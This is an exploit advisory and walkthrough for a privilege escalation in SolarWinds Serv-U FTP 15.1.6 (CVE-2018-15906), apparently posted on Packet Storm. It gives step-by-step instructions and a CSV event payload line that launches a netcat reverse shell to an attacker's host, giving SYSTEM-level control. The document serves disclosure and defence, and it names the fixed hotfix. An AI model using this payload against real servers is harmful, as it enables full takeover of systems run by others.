what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SolarWinds Serv-U FTP 15.1.6 Privilege Escalation

SolarWinds Serv-U FTP 15.1.6 Privilege Escalation
Posted Feb 2, 2019
Authored by Chris Moberly

SolarWinds Serv-U FTP Server version 15.1.6 is vulnerable to privilege escalation from remote authenticated users by leveraging the CSV user import function. This leads to obtaining remote code execution under the context of the Windows SYSTEM account in a default installation.

tags | exploit, remote, code execution
systems | windows
advisories | CVE-2018-15906
SHA-256 | b8d74d5140736265d1823436e97fb1070add29afc06762c47315c0b4594f0455

SolarWinds Serv-U FTP 15.1.6 Privilege Escalation

Change Mirror Download
CVE:                CVE-2018-15906
Attack type: Remote, authenticated
Discovered by: Chris Moberly @ The Missing Link Security
Operating Systems: Verified on Win10 and Win2016
Vulnerable version: Tested on 15.1.6 (current as of August 2018).
Fixed in: Serv-U 15.1.6 Hotfix 2

# Description
SolarWinds Serv-U FTP Server is vulnerable to privilege escalation from remote
authenticated users by leveraging the CSV user import function. This leads to
obtaining remote code execution under the context of the Windows SYSTEM account
in a default installation.

# Additonal Information
## Overview
Privilege escalation is possible from an authenticated user who is a member of
the "Domain Administrators" group to a user with full administrative rights
(System Administrator), permitting remote command execution.

Serv-U allows users with the "System Administrator" role to configure events
which trigger tasks, such as running executables. Lower-level administrators
such as "Domain Administrators" are denied this option. When authenticated as
one of these lower-level administrators, this control can be bypassed by using
the built-in user "Import" function to load a CSV file with the event already
defined.

As this tool also permits file uploads, an authenticated attacker can upload
something like nc.exe and define a trigger to execute a reverse-shell
connection to a remote box. The application installs as SYSTEM by default,
leading to a complete compromise of the machine.

This method may also bypass other restrictions, such as granting users execute
permissions on directories, elevating their administrative privileges, and
granting them access to alternative UIs.

## Exploit POC Walkthrough
Begin with a clean install of the Serv-U trial version. Log in using the
"Management Console" application on the Windows server itself. Create the
following two users in a domain called "test":
- lowpriv (no admin privileges, only read access on home directory)
- domadmin (domain administrator, read/write on home directory C:\)

Next, log in to the web interface as domadmin.

In the file area (/Web%20Client/ListDir.htm), upload an executable to the
home directory. I used "nc.exe" for its reverse-shell capabilities, but really
anything will work for a POC.

Back in the management area (/?Command=Login) go to the test domain and select
"Users". Edit the lowpriv user. Go to the "Events" tab and click "Add".
Try to set one up with "Action" set to "Execute Command" and click "Save"

You will receive a permissions error, as this is not allowed.

Still in the web UI, under Domain Users click the "Export" button to save the
CSV. Make some changes to this CSV:

Duplicate the user "lowpriv" in a new row called "lowpriv2". Find the CSV
column titled "SUEvent" and place the following test in its section for this
new user:
1,10,EventID,200,EventName,Event 01,Action,2,Data1,192.168.1.214 4444 -e cmd.exe,ExeFilePath,/nc.exe

(that is executing NC to connect back an attacking machine, which has a
listener running on 192.168.1.214 on port 4444. Adjust accordingly.)

After saving the changes, import the CSV back in while logged in as domadmin.
You should see a message that 1 of 3 users have been imported.

Now, click on "Edit" for user lowpriv2. Go to the "Events" tab and see that you
now have the "Execute Command" event that you do should not have the permission
to create.

Highlight the task and click "Test Event" and it will execute. Remove the event
if this is a production environment.

You now have a shell with SYSTEM permissions on your attacking box, giving you
complete control of the server. From here, you can compromise the box or
manually edit the Serv-U archive files to create full admin accounts.

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close